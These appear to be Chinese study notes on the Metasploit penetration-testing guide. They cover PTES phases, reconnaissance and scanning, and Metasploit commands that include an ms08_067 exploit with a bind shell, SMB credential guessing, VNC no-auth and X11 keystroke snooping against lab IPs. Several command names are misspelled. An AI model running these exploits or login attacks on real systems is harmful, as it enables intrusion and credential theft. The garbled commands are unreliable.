metasploit

Metasploit渗透测试指南

David Kennedy Diehold公司首席信息安全官。SET fast-Tracl Back Track和Exploit Database社会工程学博客网站
black hat defcon shmoocon security B-sides

Jim o'Gorman CSc公司strickForce团队的 social-engineerorg 数字取证分析和恶意代码分析
Devon Kearns offensive-security团队的一位培训讲师。back Track的开发者。揭秘教程wiki的维护者
Mati Aharoni 信达雅
没有web voip scada 真实的渗透案例:诸葛建伟

渗透测试技术基础
PTES
前期交互
情报搜集阶段
威助建模
漏洞分析
渗透攻击
后渗透攻击
报告
渗透测试类型
白盒
黑盒测试
漏洞扫描器

Metasploit
专业术语
exploit
payload
shellcode
module
listener
Metsploit
Msf终端
命令行
Armitage
用户接口
功能程序
MSF攻击载荷生成器
MSF编码器
nasm shell
express pro
第三章情报搜索
被动
whois
netcraft
Nslookup
主动
namp
Metasploit使用数据库
metasploit使用端口扫描
针对性扫描
服务器消息协议扫描
搜寻配置不当的SQL server
SSH
FTP
SNMP
编写自己的扫描器
2。2
cd /opt/framework3/msf3/
msfconsloe
help connect
终端交互 访问所有软件的功能特性
msfcli 脚本测试
msfcli windows/smb/ms08_067_netapi O
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
Start MSF
armitage
功能程序:::

公开渠道情报 OSINT yeti whois
能够攻击那些系统 边界。
searchdns.netcraft.com 网站对应IP
主动
nmap -sS -Pn 172.16.32.131 -Pn默认都是存活状态,不先ping测试存活状态 -sS隐秘TCP
-A 服务枚举和旗标获取

3.2.2数据库
/etc/init.d/postgresql-8.3 start
db_connect postgres:[email protected]/msfbook
第一次连接冗长的输出
db_status

nmap -Pn -sS -A -oX subnet1 192.168.1.0/24
db_connect postgres:[email protected]/msfbook
dm_import Subnet1.xml
db_hosts -c address
TCP空闲扫描
msf use auxiliary/scanner/ip/ipidseq
set RHosts 192.168.1.0/24
set threads 50 run
在windows平台线程不过16 ,类UNix lInux 128
nmap -PN -sI 192.168.1.109 192.168.1.155

db_connect postgres:[email protected]/msfbook
db_nmap -sS -A 172.16.32.131
db_services
search portscan
use scanner/portscan/syn
set Rhosts 192.168.1.155
set threads 50
run
3.3针对性服务扫描
use scanner/smb/smb_version
set rhost
run
show options
db_hosts -c address,os_flavor
快速且安全定位高风险主机的方法
use scanner/mssql/mssql_ping
show options
set rhosts 192.168.1.0/24
set threads 255
run

use scanner/ssh/ssh_version
set threads 50
run
use scanner/ftp/ftp_version
set threads 50
run
use scanner/ftp/anonymous
set threads 50
run
团体字符串
use use scanner/snmp/snmp_login
set rhosts 192.168.1.0/24
出厂的默认设置
3。4ruby脚本
mixin


4.1
漏洞扫描
netcat
nc 192.168.1.203 89
误报和漏报
NeXpose NEssus
社区共享版
web
db_connect postgres:[email protected]/msfbook
db_import /tmp/host_195.xml
db_vulns
db_destory删除现有的数据库
db_connect 新的
load nexpose
nexpose_connect -h
nexpost_connect dookie:[email protected] ok

nexpose_scan 192.168.1.195
db-host -c address
nessus http://localhost:8834
load nessus
nessus_connect dookie:[email protected]:8834 ok
nessus_policy_list
nessus_scan_now
nessus_scan_new 2 bridge_scan 192.168.1.195
nessus_report_list
nessus_report_get 报告ID

use auxiliary/scanner/smb/smb_login
show options
set rhosts 192.168.1.150-155
set SMBUser Administrator
set SMBPass s3cr3t

use auxiliary/scanner/vnc/nvc_none_auth
set Rhosts 192.168.1.155
run
vncviewer

useauxiliary/scanner/x11/open_x11
cd /pentest/snfifers/sxpy
./xspy -display 192.168.1.23:0 -delay 100
Autopwn自动选择




你可能感兴趣的:(Security,开发者,信息安全,编码器,工程学)